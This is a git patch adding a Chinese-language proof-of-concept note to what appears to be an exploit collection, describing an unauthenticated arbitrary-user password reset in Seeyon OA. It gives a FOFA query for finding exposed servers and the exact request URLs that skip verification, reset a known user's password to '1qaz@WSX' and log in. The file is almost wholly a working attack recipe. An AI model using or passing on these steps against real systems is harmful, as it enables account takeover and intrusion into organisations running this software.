From 811fd99a606d7ba682a32ca6fa5659e11eb38b61 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 9 Mar 2024 14:58:45 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=87=B4=E8=BF=9C=E5=89=8D=E5=8F=B0?=
 =?UTF-8?q?=E4=BB=BB=E6=84=8F=E7=94=A8=E6=88=B7=E5=AF=86=E7=A0=81=E4=BF=AE?=
 =?UTF-8?q?=E6=94=B9.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 致远前台任意用户密码修改.md | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 致远前台任意用户密码修改.md

diff --git a/致远前台任意用户密码修改.md b/致远前台任意用户密码修改.md
new file mode 100644
index 0000000..3d85d99
--- /dev/null
+++ b/致远前台任意用户密码修改.md
@@ -0,0 +1,27 @@
+## 致远前台任意用户密码修改
+
+## fofa
+```
+app="致远互联-OA"
+```
+
+## 漏洞复现
+前提需要知道用户名
+
+`http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword`
+
+<img width="1057" alt="image-20240301101704702" src="https://github.com/wy876/POC/assets/139549762/9562a165-151e-421c-a26c-7e09bf199368">
+
+`http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx`
+
+<img width="1047" alt="image-20240301101722837" src="https://github.com/wy876/POC/assets/139549762/c1ea9e86-1a92-4aaa-945d-a1a45c83509e">
+
+修改密码为`1qaz@WSX`
+
+`http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX`
+
+<img width="1217" alt="image-20240301101802224" src="https://github.com/wy876/POC/assets/139549762/5375cccc-0a9b-4ae0-8e3e-177aa67290b1">
+
+最后使用修改的密码登录
+
+<img width="1054" alt="image-20240301101840756" src="https://github.com/wy876/POC/assets/139549762/261afdc9-a728-4302-96a6-e0e19d02d338">